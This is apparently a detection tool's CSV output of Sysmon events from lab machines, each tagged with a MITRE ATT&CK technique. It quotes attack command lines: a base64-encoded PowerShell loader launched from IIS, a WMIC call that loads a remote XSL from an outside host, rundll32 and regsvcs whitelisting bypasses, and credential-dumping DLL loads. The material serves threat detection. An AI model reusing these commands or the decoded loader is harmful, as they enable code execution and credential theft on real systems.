4
1
0
0x8000000000000000
5875
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:28:42.700
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-3251-5CEB-0000-00109E06E100
748
C:\Windows\System32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
7
3
4
7
0
0x8000000000000000
20
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 16:58:13.560
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\hid.dll
6.1.7600.16385 (win7_rtm.090713-1255)
Hid User Library
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
Detect IIS/Exchange Exploitation,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) and commandline ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 ),1,"
1
5
4
1
0
0x8000000000000000
5875
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:28:42.700
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-3251-5CEB-0000-00109E06E100
748
C:\Windows\System32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243544
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.077
747F3D96-9F69-5E75-0000-0010476F2000
7836
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe)",1,"
1
5
4
1
0
0x8000000000000000
16507
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 17:09:02.275
365ABB72-532E-5CD8-0000-00106C222700
1528
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-4FB5-5CD8-0000-0020F2350100
0x135f2
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-516B-5CD8-0000-001087E41600
3788
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
7
3
4
7
0
0x8000000000000000
20
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 16:58:13.560
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\hid.dll
6.1.7600.16385 (win7_rtm.090713-1255)
Hid User Library
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,High,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 ),1,"
1
5
4
1
0
0x8000000000000000
5875
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:28:42.700
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABl
AD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
365ABB72-3251-5CEB-0000-00109E06E100
748
C:\Windows\System32\inetsrv\w3wp.exe
c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243544
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.077
747F3D96-9F69-5E75-0000-0010476F2000
7836
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1,"
1
5
4
1
0
0x8000000000000000
16507
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 17:09:02.275
365ABB72-532E-5CD8-0000-00106C222700
1528
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-4FB5-5CD8-0000-0020F2350100
0x135f2
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-516B-5CD8-0000-001087E41600
3788
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243544
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:25.077
747F3D96-9F69-5E75-0000-0010476F2000
7836
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe )",1,"
1
5
4
1
0
0x8000000000000000
16507
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-12 17:09:02.275
365ABB72-532E-5CD8-0000-00106C222700
1528
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\rundll32.exe" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-4FB5-5CD8-0000-0020F2350100
0x135f2
1
Medium
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-516B-5CD8-0000-001087E41600
3788
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436010.074656,2019-07-30T01:33:30.074656+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll ),1,"
1
5
4
1
0
0x8000000000000000
4920
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:28.893
747F3D96-6628-5D3F-0000-0010349B8800
6552
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
7
3
4
7
0
0x8000000000000000
19
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 16:58:13.309
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\samlib.dll
6.1.7601.23677 (win7sp1_ldr.170209-0600)
SAM Library DLL
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"
7
3
4
7
0
0x8000000000000000
19
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 16:58:13.309
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\samlib.dll
6.1.7601.23677 (win7sp1_ldr.170209-0600)
SAM Library DLL
Microsoft® Windows® Operating System
Microsoft Corporation
SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA
true
Microsoft Windows
Valid
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556380673.931363,2019-04-27T19:57:53.931363+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /A ),1,"
1
5
4
1
0
0x8000000000000000
6594
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1059,technique_name=Command-Line Interface
2019-04-27 15:57:53.806
365ABB72-7C01-5CC4-0000-00105C5C0C00
3076
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd.exe /A
C:\Users\IEUser\AppData\Roaming\
IEWIN7\IEUser
365ABB72-7AB1-5CC4-0000-0020BEF40000
0xf4be
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-7C01-5CC4-0000-0010F9530C00
2992
C:\Users\IEUser\AppData\Roaming\NvSmart.exe
"C:\Users\IEUser\AppData\Roaming\NvSmart.exe"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.43237,2019-05-27T05:29:18.432370+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1,"
1
5
4
1
0
0x8000000000000000
5925
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:18.392
365ABB72-3D6E-5CEB-0000-00100C96FF00
3136
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558633564.671625,2019-05-23T21:46:04.671625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
1025
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-23 17:45:34.528
365ABB72-DC3E-5CE6-0000-00102BC97200
712
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Users\IEUser\
IEWIN7\IEUser
365ABB72-CE6C-5CE6-0000-002047F30000
0xf347
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-CE6D-5CE6-0000-00109E190100
1472
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558630149.576625,2019-05-23T20:49:09.576625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
896
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-23 16:49:08.258
365ABB72-CF04-5CE6-0000-001010F20C00
4056
C:\Windows\System32\cmd.exe
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\cmd.exe"
c:\
IEWIN7\IEUser
365ABB72-CE6C-5CE6-0000-002047F30000
0xf347
1
High
SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
365ABB72-CF01-5CE6-0000-00105DA50C00
3872
C:\Windows\System32\wbem\WMIC.exe
wmic process list /format:"https://a.uguu.se/x50IGVBRfr55_test.xsl"
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436009.646278,2019-07-30T01:33:29.646278+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll ),1,"
1
5
4
1
0
0x8000000000000000
4919
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:28.756
747F3D96-6628-5D3F-0000-0010B1968800
5708
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-6609-5D3F-0000-00109FBF8500
1208
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"
7
3
4
7
0
0x8000000000000000
18
Microsoft-Windows-Sysmon/Operational
IEWIN7
technique_id=T1003,technique_name=Credential Dumping
2019-04-18 16:58:12.919
365ABB72-AC28-5CB8-0000-0010F3F70700
1200
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\cryptdll.dll
6.1.7600.16385 (win7_rtm.090713-1255)
Cryptography Manager
Microsoft® Windows® Operating System
Microsoft Corporation
